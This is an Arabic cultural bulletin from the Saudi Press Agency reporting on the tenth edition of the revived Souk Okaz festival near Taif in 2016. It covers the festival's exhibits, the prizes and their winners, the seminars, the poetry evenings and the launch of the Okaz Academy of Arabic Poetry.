النشرة الثقافية لوكالة الأنباء السعودية

7 يناير 2017

 

د / ثقافي / النشرة الثقافية لوكالة الأنباء السعودية ” واس “

الرياض   واس

     يسر وكالة الأنباء السعودية ” واس ” ، أن تقدم لكم ضمن التعاون المشترك مع اتحاد وكالات الأنباء العربية ” فانا ” نشرتها الثقافية ، والمتضمنة عدداً من العناوين ..

ـ ” عكاظ العرب ” منارة ثقافية في القرن الواحد والعشرين 

إعداد : القسم الثقافي  ” واس “

       ”  يا أيها الناس قولوا لا اله إلا الله ، تفلحوا وتنجحوا ” ، كلمات دعا بها محمد بن عبدالله عليه أفضل الصلاة والسلام العرب ، في سوق ذي المجاز ، أحد أسواق العرب التي اقترنت بسوق عكاظ وسوق مجنة ، وقرنها لهم بالفلاح والنجاح ، ولكن فوتوا على أنفسهم فرصة أن تكون منتدياتهم من أشهر المنتديات على الإطلاق .

      وعلى الرغم من تنوع فكرهم إلا أنهم لم يخلدوا ملتقاهم بما ، ينضح به من فكر ورجاحة عقول إلى خير ما عرض فيه على الإطلاق من درر ونوادر خلدت ، وستبقى خالدة بما حررت الإنسان من الكبر والتفاخر إلى السمو بالإنسان إلى المنزلة التي خلق من أجلها وارتضاها خالقه سبحانه لها .

   من هذا المنطلق النبوي الشريف واستثماراً لدروس الماضي واستشرافاً للمستقبل تبنت إمارة منطقة مكة المكرمة ، إبان تعيين  صاحب السمو الملكي الأمير خالد الفيصل أميراً لها ، فكرة إحياء سوق عكاظ ليكون أحد مخرجات الإستراتيجية التنموية للمنطقة ، بعد انقطاع دام أكثر من 13 قرناً من الزمن .

         ويعد سوق عكاظ من أشهر أسواق العرب في الجاهلية ، تجتمع فيه القبائل شهراً من كل سنة ، يتناشدون الشعر ويفاخر بعضهم بعضاً ، وقد أورد الخليل بن أحمد عن كلمة عكاظ في اللغة قوله : ( وسُمّي به لأن العرب كانت تجتمع فيه كل سنة فيعكظ بعضهم بعضًا بالمفاخرة والتناشد : أي يُدعك ويُعرك ، وفلان يعكظ خصمه بالخصومة : يمعكه ) .

       وحظي سوق عكاظ باهتمام القيادة الرشيدة ، وما ذلك إلا امتداد لحرصهم على كل ما يدفع بمسيرة الثقافة والوعي والأدب في المملكة العربية السعودية ، إيماناً منهم بالقيمة الثقافية الريادية لسوق عكاظ وما يمكن أن يمثله السوق للحركة الثقافية والأدبية في هذا الوطن ، والوطن العربي عامة .

      وحدد مكان سوق عكاظ على مسافة حوالي ” 40 ” كيلا شمال شرق مدينة الطائف على طريق الرياض السريع بمنطقة يقال لها العرفاء .

وتأتي أهمية سوق عكاظ كونه ملتقى شعرياً وفنياً وتاريخياً فريداً من نوعه ، يقصده المثقفون والمهتمون بشؤون الأدب والثقافة ، وكان الملك فيصل بن عبدالعزيز آل سعود – رحمه الله – أول من اهتم بتعيين وتحديد مكان سوق عكاظ عندما كلف الدكتور عبدالوهاب عزام – رحمه الله – بزيارة المنطقة والتحقق من موقع السوق وآثاره الباقية ، فقام بالمهمة وألف كتابه المعروف بعنوان ” عكاظ ” ، وكان لصاحب السمو الملكي الأمير فيصل بن فهد بن عبدالعزيز – رحمه الله – جهوداً في الدعوة إلى إحياء سوق عكاظ  .

    واستمرت الدعوة إلى إحياء سوق عكاظ والمطالبة إلى إعادة مجده وسابق عهده ، حتى كان ذلك في عهد خادم الحرمين الشريفين الملك عبد الله بن عبد العزيز آل سعود – رحمه الله – عام 1428 هـ بعد غياب استمر حوالي ” 1300″ سنة ، وافتتحه نيابة عن خادم الحرمين الشريفين صاحب السمو الملكي الأمير خالد الفيصل أمير منطقة مكة المكرمة ، واستمر هذا المشروع الثقافي العريق في كل عام يظهر تطوراً جديد في فعالياته وينتظر اكتمال عناصر المدينة الثقافية السياحية لسوق عكاظ .

 وانطلقت أول دورة للسوق في عام ( 1428هـ 2007م ) ، حيث أصبحت جوائز سوق عكاظ منافسة على مستوى الوطن العربي ، وهي تغطي مساحة واسعة من الإبداع الفني ابتداء من الشعر مروراً بالفن التشكيلي والخط العربي وانتهاء بالفلكلور، وهي اليوم موضع عناية واهتمام من المثقفين بل إنها أصبحت واحدة من أهم آمال وطموحات المبدعين في مختلف الأقطار العربية .

    ومنذ انطلاقة فعالياته ظل العطاء متواصلاً مكتسياً في كل عام حلة جديدة ورؤية متميزة قدم فيها نماذج متنوعة من المشاركات والأفكار والرؤى التي تعكس حرص المملكة على تطوير فعاليات هذا النشاط الثقافي التراثي والارتقاء بمفهومه  بالصورة التي تليق بالمملكة والعرب .

      وتتكون مدينة سوق عكاظ الحديثة من جادة تمتد على مسافة كيلو متر تحيطها الخدمات والحدائق لخدمة زوار سوق عكاظ من كل الاتجاهات ، وعلى جوانب الجادة ، أكثر من (200 ) معرض متنوع ومتخصص بمشاركة جهات حكومية وخاصة ، و (160) جناحاً تتضمن مشاركة الحرفيين والحرفيات والأسر المنتجة  ، ومعرض لمصنع كسوة الكعبة ، والمعهد المهني ، ومعرض للقوات المسلحة ، إضافة إلى معرض شركة تراثنا للمسؤولية الاجتماعية ، وعدد من المزارعين المشاركين في أنشطة جادة سوق عكاظ لعرض وتسويق منتجاتهم المتنوعة  .

     وفي نهاية الجادة خيمة سوق عكاظ الرئيسة عبارة عن مسرح ضخم مدرج يتسع لأكثر من ” 3000 ” شخص مجهز بأحدث التقنيات والخدمات ، انطلق منه حفل افتتاح الدورة العاشرة لسوق عكاظ ، تحت رعاية خادم الحرمين الشريفين الملك سلمان بن عبدالعزيز آل سعود ” حفظه الله “مساء الثلاثاء الموافق للسادس من ذي القعدة من عام 1437هـ ، وشارك أكثر من ” 3 ” ألاف مشارك ومشاركة من داخل المملكة العربية السعودية ومن مختلف الدول العربية في فعاليات سوق عكاظ في دورته العاشرة  .

   وشرعت هيئة السياحة والتراث الوطني بمتابعة وإشراف صاحب السمو الملكي الأمير سلطان بن سلمان بن عبدالعزيز رئيس الهيئة العامة للسياحة والآثار ، في تطوير عناصر مخطط جادة سوق عكاظ التي تمثل العنصر الرئيس في برامج وأنشطة السوق ، حيث تشهد سنوياً تنظيم سلسلة من المعارض المتخصصة ، للتعريف بمساهمات الوزارات والهيئات والقطاعات الحكومية المشاركة في مجالات الثقافة والعلوم والمعرفة، والتواصل مع الجمهور الراغب في التعرف على طبيعة أعمال تلك الجهات وإنجازاتها .

     وحرصت هيئة السياحة على تطوير عناصر مخطط جادة سوق عكاظ الماضي والمستقبل بالتنسيق مع الشركاء ذوي العلاقة ، وتقديم الدعم المالي والفني لتنظيم فعاليات الجادة والسوق ، التراثية والثقافية ، وجائزة الحرف اليدوية ( بارع ) ، وكذلك تنظيم مشاركة الحرفيين من المملكة وخارجها ، وتنفيذ أنشطة تسويقية إعلامية لفعاليات الجادة .

    وتنظم الهيئة رحلات سياحية لزوار سوق عكاظ ، تشمل المعالم السياحية والأثرية في محافظة الطائف ، إضافة لتنظيم المعرض المصور المخصص للبعد الحضاري ، وتؤدي الهيئة العامة للسياحة دوراً مهما من خلال توسعة مساحة سوق عكاظ بإضافة حوالى 4 ملايين متر مربع ، وتنسيق الموقع مع العناصر المجاورة مثل واحة التقنية ، إضافة لإقامة منتجع صحي ترفيهي في المستقبل .

      وتشتمل فعاليات جادة ” سوق عكاظ  ” على عروض ثقافية وتاريخية , وعروض للشعر العربي في المسارح المفتوحة , وعروض للخيل والإبل على طول الجادة ، وعروض الرياضات التراثية ، وعروض الحرف والصناعات اليدوية ، وعروض الأسر المنتجة ، وعروض المقتنيات الأثرية والتراثية ، وأسواق المأكولات الشعبية ، وعروض مسرحية ، وعروض منتجات العسل ، وعرض منتجات الورد الطائفي .

      وتم إنشاء خيمتين في الجهة الشمالية من موقع السوق تكفلت بإنشائها وزارة التعليم بتكلفة مالية تقدر بأكثر من 40 مليون ريال ، لتكونا رافدًا مهما للخيمة الكبرى  ، على مساحة 2572 مترًا مربعاً  .

     وستكون الخيمتان مسرحاً للأنشطة الثقافية والأمسيات والندوات ، فيما ستخصص الخيمة الرئيسة  للمناسبات الكبرى ، وتضم الخيمتان قاعات ومسرحاً ، بالإضافة لمسجد مساحته (30 ×40 م) ومرافق أخرى مرتبطة بالمشروعين .

   ووثقت ” 20 ” مؤسسة ثقافية وتعليمية وتنموية شاركت بمعارض في سوق عكاظ ، تعنى بالثقافة والتاريخ والعلوم في موقع واحد ، أحدث المعلومات والفنون التي تقدمها بهوية السوق ، وركزت في معظمها على رؤية المملكة 2030 ، منها وزارة الصحة حيث احتوى  معرضها على شاشات عرض تعريفية بالمديرية العامة لصحة مكة ، وركن خاص لتسجيل المتبرعين بالخلايا الجذعية وأخذ عينات مبدئية منهم ، وركن العناية بصحة الأسنان .

     إضافة إلى معرض الخط العربي والتصوير الذي تقيمه وزارة التعليم للتعريف بأهمية الخط العربي ، وكيف كانت بدايته مع سوق عكاظ ، ومراحل تطوره وإثراء التنافس بين الخطاطين من خلال مسابقة هدفها الارتقاء بأساليبه الفريدة ، حيث احتوى المعرض على لوحات للخط العربي بجميع أنواعه , فيما هدف معرض مسابقة لوحة وقصيدة إلى تشجيع الفنون بشكل عام وما يرتبط منها بفن العرب الأول ( الشعر ) وتوثيق العلاقة بين الشعر والرسم .

     واشتمل معرض الكتاب الإلكتروني في جناح وزارة الثقافة والإعلام على العديد من الكتب الإلكترونية ، المختلفة في مجالات عديدة كالدواوين الشعرية والكتب المتخصصة في مجالات الطفل ، والإسلام ، والتاريخ ، والطب ، والأسرة والعلوم وغيرها من المجالات.

     ورصد معرض هيئة الإذاعة والتلفزيون مراحل تطور الإذاعة والتلفزيون ابتداء باستخدام معدات وأجهزة قديمة وحتى الأجهزة الحديثة ، وعرض البرامج الدينية والثقافية والرياضية وبرامج الأطفال بالإضافة الأفلام العلمية القديمة .

   وقدم معرض وكالة الأنباء السعودية ( واس ) لزوار سوق عكاظ أهمية وكالة الأنباء السعودية كمصدر أخبار رسمي للمملكة ودورها البارز في إيصال الجهود التي تبذلها في جميع المناشط المحلية ، والدولية ، حيث ضم معرض خيمة ” واس ” أكثر من ” 75 ” صورة لملوك هذه البلاد ومراحل التطور التي مرت بها المملكة ، وصوراً خاصة لجنودنا البواسل في مختلف ميادين الشرف في مملكتنا الحبيبة .

     فيما هدف معرض الهيئة العامة للإعلام المرئي والمسموع إلى التعريف بالهيئة والمهام المختصة بها ، وتزويد الجمهور بالمواد الإعلامية المرئية والمسموعة الترفيهية والثقافية والتعليمية ، وتقديم لوائح المواد والأجهزة الإعلامية  التي تندرج تحت مسؤولية الهيئة واختصاصاتها والتعريف بها والإجابة عن استفسارات الجمهور وذوي الاختصاص .

   وتتلخص أهداف معرض أمانة محافظة الطائف في تعريف زائريه بأهم المشروعات التي تقوم الأمانة بتنفيذها والإشراف عليها وإطلاعهم على المشروعات المستقبلية التي وضعت ضمن خطط الأمانة للسنوات المقبلة ،وضم صورا للمشروعات الحالية مع شروح وافية لها ومراحل تنفيذها ومجسمات للمشروعات توضح ما هيتها .

    ويعد معرض أمانة العاصمة المقدسة بوابة تعريفية تعكس الجانب التراثي المعماري في العاصمة المقدسة لإبراز التاريخ المكي والحياة المكية كونها عاصمة الحضارات والثقافات على مر العصور ، واحتوى المعرض على مجلس نسائي وآخر رجالي ومراكز مصممة بطابع تراثي ، بالإضافة إلى لوحة لستارة الكعبة وفوانيس وقناديل من خشب ومقتنيات أثرية من مختلف القرون .

    واستعرض معرض أمانة محافظة جدة تاريخ مدينة جدة على مر القرون وأهمية مدينة جدة وتعزيز مكانتها الفريدة كبوابة للحرمين الشريفين ، حيث احتوى المعرض على مجموعة من المعروضات التي تربط تاريخ محافظة جدة بحاضرها وطموح المدينة لتصبح مقصدا تجاريا وسياحيا متميزا عالمي المستوى في ظل تنمية عمرانية مستدامة .

    وقدم معرض هيئة تطوير مكة المكرمة والمشاعر المقدسة المشروعات التنموية والتطويرية بمكة المكرمة من خلال مجسمات ومطبوعات وشاشات عرض للمشروعات التي شهدتها وتشهدها مكة المكرمة .

   وشاركت جامعات القصيم ، الإمام محمد بن سعود الإسلامية ، الملك خالد، الملك عبدالعزيز ، والطائف ، بمعارض مستقلة تستعرض فيها نشأتها ومراحل تطورها ، وأنشطتها ، وبنيتها التحتية والخدمات التعليمية التي تقدمها ومسؤوليتها المجتمعية في تطوير المعرفة والبحث عن الابتكار وريادة الأعمال ، وعرض الابتكارات والاختراعات .

   واحتوى معرض مشروع تعظيم البلد الحرام على عدة أركان تمثل تاريخ مكة المكرمة وخصائصها وتقديم نماذج مشرقة لسلوك ساكنيها ، كما يحتوي على مرسم للأطفال يسهم في ربط الناشئة بقبلتهم وجملة من الفعاليات والمسابقات والمشاهد المسرحية .

    فيما اشتمل معرض مركز الملك عبدالعزيز للحوار الوطني على لوحات تعريفية وشاشات تلفزيونية للعرض والتعريف باللقاءات الوطنية والدورات والمحاضرات التي يقدمها المركز وتقديم مجموعة من المحاضرات القيمة والندوات بالإضافة إلى عقد دورات تدريبية وتقديم مواد تلفزيونية تثقيفية عن الحوار .

       وشاركت مكتبة الملك عبدالعزيز العامة في مهرجان سوق عكاظ بجناح ضم معرضًا مصورًا عن خادم الحرمين الشريفين الملك سلمان بن عبدالعزيز – حفظه الله- خلال مراحل معينة من مسيرة حياته ، بالإضافة إلى مكتبة الطفل التي تخصص معرضًا متكاملاً هو قطار القراءة ومسرح الطفل  .

    وتغطي جوائز ” سوق عكاظ ” العشر عشرة مجالات هي .. جائزة شاعر شباب عكاظ مخصصة للشعراء الشباب ، وتهدف إلى تشجيع الشعراء الشباب بالمملكة ، وقيمتها 100 ألف ريال .

      وجائزة لوحة وقصيدة تشجع الفنون عامَّة وما يرتبط منها بفن العرب الأول وهو الشعر ، بإيضاح العلاقة الوثيقة بين الشعر والرسم ، وقيمتها 100 ألف ريال حدد لها 3 مراكز .

      وجائزة التصوير الضوئي مفتوحة للمصورين من داخل المملكة وخارجها ، والمشاركة متاحة للجنسين ، وجائزتها 100 ألف ريال على 3 مراكز أيضا . فيما جاءت جائزة الخط العربي مفتوحة للخطاطين من داخل المملكة وخارجها ، وقيمتها 100 ألف ريال على 3 مراكز ، وجائزة رائد أعمال عكاظ تهتم بريادة الأعمال في تأسيس شركات ناشئة عبر حلول إبداعية وقيمتها 200 ألف ريال .

      واستحدثت جائزة مبتكر عكاظ : تستهدف المبتكرين في المملكة الذين نجحوا في تحويل أفكارهم الإبداعية والابتكارية إلى منتجات أو خدمات ذات عوائد مالية ، وقيمتها 100 ألف ريال .

      وجائزة الرواية .. لتشجع كتابة السرد عبر ثلاثة فروع ( الرواية والقصة القصيرة والسيرة الذاتية ) ، في كل عام تقدم الجائزة في أحد الفروع ، وقيمتها 100 ألف ريال .

      أما جائزة الحرف اليدوية فهدفها التعريف بالحرفيين وبمنتجاتهم اليدوية والاهتمام بهم وتشجيعهم على الإبداع واستمرار العطاء وتنمية مهاراتهم وقيمتها 500 ألف ريال توزع بآلية خاصة عبر عدة مراكز .

      وكذلك جائزة الفلكلور الشعبي والخاصة بمحافظات منطقة مكة المكرمة وقيمتها 100 ألف ريال على 3 مراكز .

      وأخيراً جائزة شاعر عكاظ والتي تهـدف إلى  الاعتناء بالشعر العربي الفصيح وتقدير الشاعر العربي المتميّز ، من خلال منحه وسام الشعر العربي ممثلاً في لقب ” شاعر عكاظ “، وهي حق لكل شاعر من شعراء العربيَّة له إنتاج منشور . ومقدار الجائزة 300 ألف ريال .

      وتميز ( عكاظ  10 ) بمسرحياته وأمسياته الثقافية ، شارك فيها أكثر من 30 مفكراً وأديباً بأوراق عمل وبحوث أدبية علمية في 7 ندوات ثقافية أقيمت على مدى 3 أيام ، ركزت على الدراسات النقدية للشاعر الجاهلي عروة بن الورد ، وللشاعر والأديب السعودي عبدالله بن خميس ، وبحث جهود الترجمة في فرنسا ، والمخطوطات المهاجرة ، وتناولت عددا من التجارب الكتابية والفنية ، إلى جانب البحث عن موضع الهوية الثقافية في العالم الرقمي ، وحماية الخصوصية في وسائل التواصل الاجتماعي.

     وافتتحت فعاليات سوق عكاظ بملتقى الريادة المعرفية الذي أقيم في فندق إنتركونتننتال الطائف ثاني أيام الدورة العاشرة ، وناقش مستقبل الأعمال الريادية في ضوء رؤية المملكة 2030 ، من خلال ”  3 ” محاور ( استراتيجيات خدمات الريادة المعرفية ، الخدمات المعرفية لريادة الأعمال ورؤية 2030م ، الشراكات المعرفية ومستقبل ريادة الأعمال ) .

        والتقى صاحب السمو الملكي الأمير خالد الفيصل مستشار خادم الحرمين الشريفين أمير منطقة مكة المكرمة ثاني أيام الدورة العاشرة , بضيوف السوق من علماء وأدباء وشعراء ومثقفين ومفكرين حضروا للمشاركة في هذا المحفل الثقافي العربي الضخم ، واستمع لمقترحاتهم وآرائهم التطويرية التي تسهم بالارتقاء بمستوى الثقافة العربية .

       وسلطت الندوة الأولى التي أقيمت صباح اليوم الثالث من أيام السوق في فندق إنتركونتينتال وشارك فيها الناقد والفنان التشكيلي المغربي بنيونس عميروش ، والروائي السعودي مقبول العلوي الحاصل على جائزة سوق عكاظ للرواية ، والناقد علي الشدوي ، والناقد المصري الدكتور عمار علي حسن ، وأدارها الدكتور أحمد التيهاني، لتسليط الضوء على  التجارب في الكتابة والفنون .

     فيما تناولت الندوة الثانية موضوع حماية الخصوصية في وسائل التواصل الاجتماعي ، وشارك فيها الدكتور عوض الأسمري ، والدكتور عبدالرحمن بن حسن المحسني ، والدكتور جهاد العمري ، والدكتور فارس الهمزاني ، وأدار الندوة متعب الحارثي .

    وبحث المشاركون في الندوة الثالثة التي أقيمت بعد صلاة مغرب ذات اليوم في الخيمة الثقافية بالسوق موضوعات عن الشاعر السعودي عبدالله بن خميس ، شارك فيها الدكتور محمد بن عبدالرحمن الربيع والدكتور سعود بن سليمان اليوسف ، والدكتور عبدالله بن عبدالرحمن الحيدري ، والدكتورة هيا بنت عبدالرحمن السمهري ، وأدار الندوة الدكتور صالح بن زياد .

      أما الندوة الرابعة التي أقيمت عصر اليوم الرابع من أيام الدورة العاشرة لسوق عكاظ  فناقشت ” اللغة العربية في فرنسا “, وشارك فيها المترجم الفرنسي لوك باربوليسكو ، وأدريان ليتس ، ومحمد البشاوري وعلي عتيق ، بإدارة إبراهيم أبو نمي ، تلاها مباشرة ندوة ” الهوية الثقافية في العالم الرقمي”, شارك فيها خالد الغازي ، وأحمد آل مريع وخالد الغامدي ، وصالح بن سالم ، فيما أدارها الناقد سعيد السريحي .

   وبحثت الندوة السادسة التي أقيمت في اليوم الخامس بعض الدراسات الأدبية النقدية للشاعر عروة بن الورد ، وشارك فيها عبدالله الزهراني ، وأيمن ميدان ، صالح الدوش ، محمد عطا الله ، وأدارها عبدالمحسن القحطاني .

    واختتمت ندوات سوق عكاظ بندوة عن المخطوطات المهاجرة في الخيمة الثقافية ، شارك فيها محمد هادي مباركي ، علي محمد عمران ، محمد عزيز شمس الحق ، محمد خير البقاعي وأدار الندوة فهد الجهني .

   وصدح ” 24 ” شاعراً من عشر دول عربية على مدى ثلاثة أيام , وفي ثلاث أمسيات شعرية ، أقيمت في الخيمة الثقافية بموقع السوق التاريخي بمحافظة الطائف ، من الساعة التاسعة مساء خلال الإيام الثالث والرابع والخامس من أيام السوق ، حيث شارك في الأمسية الأولى كل من خالد الوغلاني من تونس ، وابتهال مصطفى من السودان ، وتهاني الصبيحة من السعودية ، ومحمد البريكي من الإمارات ، وعلي الحازمي من المملكة ، وأحمد بلبولة من مصر، وأدار الأمسية الدكتور محمد ربيع .

   أما الأمسية الثانية فشارك فيها كل من عدنان الصايغ من العراق ، وأحمد لحريشي من المغرب ، وأدريس نورالدين من السودان ، ومحمد حبيبي من المملكة ، ورجا القحطاني من الكويت ، وحياة نخلي من المغرب ، وسلمى الفايد من مصر، وأبو شجه بابانا من موريتانيا ، وأدار الأمسية حماد السالمي .

    فيما خصصت الأمسية الثالثة لإبداعات الشعراء الشباب ، شارك فيها الشاعر خليف الغالب الشمري الفائز بجائزة شاعر شباب عكاظ لهذا العام ، بجانب نجلاء مطر ، زاهد قرشي ، وإبراهيم حلوش ، ومحمد التركي ، وحيدر العبدالله ، وعبدالله الهميلي ، وأدار الأمسية مفرح الشقيقي .

    يذكر أن سوق عكاظ يمتد على مساحة تقدر بـ 11 مليون متر مربع شمال شرق الطائف ، وشرعت الهيئة العامة للسياحة والتراث الوطني في تطوير هذا السوق ليكون فعالية اقتصادية وثقافية حديثة , وليشكل قوة ترابط اقتصادي وثقافي يخدم اقتصاد محافظة الطائف ومنطقة مكة المكرمة والمملكة بشكل عام .

      ومعروف أن عكاظ كانت أشهر أسواق العرب قاطبة منذ أزمان بعيدة وموقعاً حافلاً بكل أنواع النشاط التجاري ، ومنتدى ثقافياً تعرض فيه حوليات الشعراء في احتفالات كبرى ، وملتقى اجتماعياً يلتقي فيه القاصي والداني مما صنع شهرتها على مر العصور ، وجعلها باقية في ذاكرة الناس إلى الوقت الحاضر.. وهناك بقايا وأطلال يرجع تاريخها لأكثر من 1300 عام مثل النقوش الأثرية والصخور المعروفة منذ القدم بموقع السوق ومجرى العين التي كانت تغذي السوق بالماء للشرب .

 ——–

  • أمير مكة المكرمة يكرم الفائزين بجوائز سوق عكاظ ” 10 ”

كرم صاحب السمو الملكي الأمير خالد الفيصل بن عبدالعزيز مستشار خادم الحرمين الشريفين أمير منطقة مكة المكرمة رئيس اللجنة الإشرافية لسوق عكاظ مساء الثلاثاء السادس من ذي القعدة 1437هـ الموافق 9 أغسطس لعام 2016م ، الفائزين بجوائز الدورة العاشرة لسوق عكاظ، وذلك بمقر السوق في العرفاء بمحافظة الطائف .

وقد أقيم حفل خطابي بهيج ونقل الحدث على الهواء مباشرة في أكثر من قناة تلفزيونية ، رحب في بدايته صاحب السمو الملكي الأمير خالد الفيصل بن عبدالعزيز مستشار خادم الحرمين الشريفين أمير منطقة مكة المكرمة رئيس اللجنة الإشرافية لسوق عكاظ بالحضور وقال ” أنه تلقى أثناء تجوله بجادة عكاظ اتصالا من خادم الحرمين الشريفين الملك سلمان بن عبدالعزيز آل سعود ـ حفظه الله ـ وجهه فيه بنقل تحياته لمن حضر ومن سيحضر ومن سيشارك في عكاظ ” .

وتحدث سمو أمير منطقة مكة المكرمة رئيس اللجنة الإشرافية لسوق عكاظ , عن حالات الحضور والغياب لعكاظ ، مشيراً إلى الكيفية التي كان عليها عُكاظ، حيث غاب عُكاظ، وحضر عُكاظ ، مبيناً سموه أنه مايَهُمّنا اليوم، هو كيف ولماذا حضر عُكاظ .

وشرح سموه قائلاً ” لم يَهُنْ على الملك فيصل ـ يرحمه الله ـ ضيـاعُ عُكاظ ونِسْيانه فبحث عنه حتى وجد وحدّد مكانه ، ثم أَصْدر الملك عبدالله بن عبدالعزيز ـ يرحمه الله ـ أمـر اسْتـــدعاءٍ ملكيِّ تاريخـيِّ اسْتثنائي فحضر عُكاظ ”  .

وقال سمو أمير منطقة مكة المكرمة ” خْروج عُكاظ من سجن الماضي البعيد بُحلّةٍ سعـوديّةٍ حديثة للإسهام في مشْـــروع النَّهْـــــضـــــــة السعـــوديّـــة العربيّـــــــة الإسلاميّــــة بقيادة الملك الهُمام سلمانَ الإقْدام شعـــاره الإسْلام في وطــــن السلام كان لعُكــاظ وَحْشــة ، فأصبــح له دَهْشــة الكُــلُّ من حـــوله في فتن الحـــروب مشغول وهو يُكرِّمُ إبْداعَ العُقول في ســـــــــــــاحــةِ فــــكـــــر لا ميزةَ فيها لعربيِّ على عربيِّ إلّا بالإبْداع , مرحباً بكــم في عُكــــاظكم الجـــــديد عُكاظِ الماضي رمْزاً .. والحاضرِ فكْراً والمستقبلِ أمــــــلا”  .

عقب ذلك قلدت شاعرة عكاظ في العام الماضي ربى الحاج البردة للفائز بجائزة شاعر سوق عكاظ لهذا العام محمد محمود العزام من الأردن, كما قدم الشاعر جاسم الصحيح جائزة شباب عكاظ لشاعر شباب عكاظ الشاعر السعودي خليف بن غالب الشمري, كما قدم مدير الجمعية العربية السعودية للثقافة والفنون سلطان البازعي الفائزين بجائزة لوحة وقصيدة وهم عبدالرحمن خضر الغامدي (المركز الأول) ، ومحمد علي الشهري ( المركز الثاني)، وسعيد الهلال الزهراني (المركز الثالث).

    وقدم محمد البريكي من الشارقة جائزة الرواية التي تم استحداثها في الدورة الحالية ونالها الروائي السعودي مقبول موسى العلوي عن رواية (البدوي الصغير), كما قدم رئيس النادي الأدبي في الرياض الدكتور عبدالله الحيدري الفائزين بجائزة الخط العربي وهم عبدالباقي أبو بكر من ماليزيا وحصد المركز الأول، ومحفوظ ذنون يوسف عراقي الجنسية ثانيًا ، فيما حل ثالثاً يحيى محمد فلاته من نيجيريا، وقدم جائزة التصوير الضوئي الطبيب والفنان التشكيلي أحمد الماطر للفائزين عبدالرحمن إبراهيم الماجد من البحرين في المركز الأول ، وثانياً ظافر مشبب الشهري من السعودية ، وحاز على المركز الثالث قاسم محمد الفارسي من السعودية.

فيما قدمت الدكتورة نجاح عشري من جامعة الملك عبدالله للعلوم والتقنية جائزة مبتكر عكاظ وحصل عليها الدكتور أنس محمد باسلامة من السعودية, كما قدم مدير مركز الملك سلمان للشباب هاني المقبل جائزة رائد أعمال عكاظ المستحدثة لأول مرة في الدورة العاشرة وحصل عليها لؤي محمد نسيم من السعودية.

وأختتم الحفل بوصلة غنائية لفنان العرب محمد عبده ” أفاطمُ مهلا ” .

———-

-تدشين أكاديمية عكاظ للشعر العربي

دشن صاحب السمو الملكي الأمير خالد الفيصل بن عبدالعزيز مستشار خادم الحرمين الشريفين أمير منطقة مكة المكرمة ، ثاني أيام الدورة العاشرة لسوق عكاظ في السابع من ذي القعدة 1437هـ ، أكاديمية عكاظ للشعر العربي ، بحضور معالي وزير الثقافة والإعلام الدكتور عادل بن زيد الطريفي ، ومعالي مدير جامعة الطائف الدكتور حسام زمان ، وذلك بالقاعة الكبرى بجامعة الطائف.

وأوضح سموه خلال مشاركته في حوار مع شباب عكاظ ضمن فعاليات سوق عكاظ بجامعة الطائف ، أن أكاديمية الشعر العربي تعمل على الاهتمام بالشعر العربي بالوطن العربي كله ، بجانب اهتمامها بطباعة دواوين شعراء عكاظ.

وأشار سموه إلى أن بلادنا كانت تحتاج العون من الدول التي حولنا ، والآن بفضل من الله نقدم العون لكل من حولنا ، وبحمد من الله فقد نجحنا قبل وبعد النفط.

ولفت سمو الأمير خالد الفيصل إلى أن المملكة تمر بمرحلة تحول أعلنت عنها قيادة هذه البلاد للوصول إلى التقدم العلمي وعصر التقنية وريادة الأعمال إنسانًا ومكانًا.

———–

  • سوق عكاظ 10 يجسد الثقافات والعادات لدى الأطفال

جسد الأطفال في سوق عكاظ البعد التاريخي والشعبي من خلال ربط الأجيال الحاضرة بالجيل الماضي ، فعندما تقف على جادة عكاظ تجد الكثير من الأطفال من مختلف الأعمار ، ومن كلا الجنسين ، وقد اكتسوا بالملابس التاريخية والشعبية القديمة ، التي تعكس الثقافات والعادات لدى الشعوب العربية بشكل عام والمملكة بشكل خاص ومحاكاة الحقب الماضية من الزمن .

كما تؤكد على الهوية العربية والإسلامية وما تزخر به من معانٍ سامية وأهداف نبيلة جعلت منها منهجاً صحيحاً لكل زمان ومكان ، فيما ترى الأطفال الآخرين مندمجين في التقاط الصور التذكارية مع الحرفيين والحرفيات ، وبعض الشخصيات التاريخية التي تمثل المسرحيات التي تقام في مسرح الشارع بالجادة ،وما يحويه السوق من إرث شعبي قديم .

وقال محمد الشهري أحد رواد السوق : إنه يأتي بأبنائه ليتعرفوا على الثقافات العربية القديمة والتراث الشعبي في المملكة ، وما تحويه من القيم والعادات التي تكاد تتلاش في زمننا الحاضر ، مضيفاً أن السوق يزخر بالمكتسبات الثقافية التي قلما نشاهدها في بلدان عربية أخرى ، يجب الاستفادة منها .

من جانبه أكد فهد العتيبي أن السوق يبرز الحضارة العربية وأثرها في بناء الإنسان ، وإعادة أمجاد السوق وإحيائه من جديد، حيث جعل منه نقطة التقاء بين الثقافات المختلفة والملامح التاريخية ، وهي ما يجب أن نعلمه أبناءنا ونقل تلك الحضارات لهم.

——————

            – سوق عكاظ يكرم 3 جهات قدّمت 66 ابتكارا

كرم سوق عكاظ أفضل العارضين في عكاظ المستقبل، حيث فازت بالمركز الأول مدينة الملك عبدالعزيز للعلوم والتقنية التي قدمت 39 ابتكارا، تلتها جامعة الملك عبدالعزيز التي قدمت 16 ابتكارا، منها 9 ابتكارات حاصلة على براءة اختراع، وإدارات التعليم في جدة ومكة والليث والطائف في المركز الثالث بعد أن قدمت 11 ابتكارا .

وبين المشرف على المعرض، عضو لجنة التحكيمالدكتور سعيد المالكي أن تقييم الفائزين اعتمد على 5 عناصر، تمثلت في تصميم المعرض وجودة المحتوى وأسلوب العرض والحضور المستمر وتفاعل الحضور، لافتا النظر إلى أن الأمير خالد الفيصل يسعى لدعم الأفكار المميزة التي تشارك في عكاظ المستقبل وعدم الاكتفاء بتكريمها من خلال إيجاد الداعمين والمستثمرين الذين يستطيعون ترجمتها على أرض الواقع، مؤكدا أن هناك عدة ابتكارات تلقت دعما من مؤسسات وشركات لتحويلها إلى واقع ملموس.

وأشار إلى أن عكاظ المستقبل تحول إلى منصة تجمع المبتكرين والمستثمرين حيث “وجهنا الدعوة إلى العديد من الجهات الحكومية والخاصة لزيارة المعرض والاستفادة من الابتكارات التي يحويها،وكان من نتائج ذلك حصول بعض الابتكارات على دعم معنوي ومادي، حيث فتح وزير الحج الباب لجميع المشاركين لعرض ابتكاراتهم على الوزارة للاستفادة مما يناسبها منها ” .

وأوضح أن معظم المشاركين في المعرض يملكون براءات اختراع، في حين القلة القليلة التي لا تملك براءة اختراع قدمت عروضا شفهية عن ابتكاراتها ولم تقدم مجسمات لها، ولم تدخل في التفاصيل خوفا على الفكرة، وأن معرض عكاظ المستقبل ضم 105 ابتكارات سعودية واحتوى 18 جناحا.

